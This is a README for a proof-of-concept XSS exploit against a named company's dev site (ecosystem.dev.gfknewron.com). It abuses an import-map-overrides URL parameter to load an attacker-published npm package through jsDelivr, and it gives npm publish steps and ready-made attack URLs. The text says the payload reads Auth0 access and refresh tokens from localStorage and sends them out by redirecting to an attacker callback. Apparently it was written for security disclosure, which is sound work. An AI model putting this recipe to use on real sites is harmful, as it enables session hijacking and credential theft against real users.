GfK import-map-overrides XSS PoC

Quick Start

1. Publish to npm

# Change the package name in package.json to your npm scope first
npm login
npm publish --access public

2. Verify on cdn.jsdelivr.net

https://cdn.jsdelivr.net/npm/[email protected]/index.js

3. PoC URL (one-click XSS)

https://ecosystem.dev.gfknewron.com/?imo={"imports":{"@ecosystem/app":"https://cdn.jsdelivr.net/npm/[email protected]/index.js"}}

URL-encoded version:

https://ecosystem.dev.gfknewron.com/?imo=%7B%22imports%22%3A%7B%22%40ecosystem%2Fapp%22%3A%22https%3A%2F%2Fcdn.jsdelivr.net%2Fnpm%2FYOUR-PACKAGE-NAME%401.0.0%2Findex.js%22%7D%7D

How it works

1. ?imo= parameter is read by import-map-overrides.js (developer tool shipped to production)
2. It overrides the @ecosystem/app module URL to point to attacker's npm package on cdn.jsdelivr.net
3. SystemJS creates <script src="cdn.jsdelivr.net/npm/..."> — CSP allows cdn.jsdelivr.net
4. Attacker's JS executes: reads Auth0 tokens from localStorage
5. Exfiltrates via window.location redirect (CSP has no navigate-to restriction)

What the payload does

• Shows red overlay with evidence (for screenshot)
• Reads all localStorage keys (Auth0 access/refresh tokens)
• After 5 seconds, redirects to attacker callback with stolen data